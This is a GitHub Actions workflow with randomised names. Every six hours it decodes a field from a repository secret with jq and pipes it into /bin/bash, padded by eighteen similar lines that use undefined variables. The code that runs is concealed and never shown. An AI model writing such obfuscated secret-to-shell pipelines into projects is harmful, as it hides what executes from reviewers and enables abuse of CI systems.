name: hangzizuoh

on:
  workflow_dispatch:
  schedule:
    - cron: '16 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hangzizuoh
        env:
          f69: ${{ secrets.f69 }}
        run: |
          echo $f69 | jq -r .nlc9178 | /bin/bash
          echo $lr4 | jq -r .haq26594 | /bin/bash
          echo $d1995 | jq -r .ec04 | /bin/bash
          echo $qktcm23 | jq -r .ioqdb7982 | /bin/bash
          echo $omkwi16189 | jq -r .eg3416 | /bin/bash
          echo $fccu7 | jq -r .t27 | /bin/bash
          echo $jm4 | jq -r .ijy72877 | /bin/bash
          echo $pnu9 | jq -r .usuc341 | /bin/bash
          echo $h02 | jq -r .jt412 | /bin/bash
          echo $p316 | jq -r .wfh92 | /bin/bash
          echo $bgob39538 | jq -r .tuq42 | /bin/bash
          echo $bqlst310 | jq -r .xfewk1 | /bin/bash
          echo $m7 | jq -r .lpnzi966 | /bin/bash
          echo $ih150 | jq -r .yts06734 | /bin/bash
          echo $clurn3 | jq -r .pct256 | /bin/bash
          echo $ewxaa306 | jq -r .nx51 | /bin/bash
          echo $u7 | jq -r .p061 | /bin/bash
          echo $ywknn733 | jq -r .msnqw34 | /bin/bash
          echo $wxtf1665 | jq -r .cbyjx7 | /bin/bash

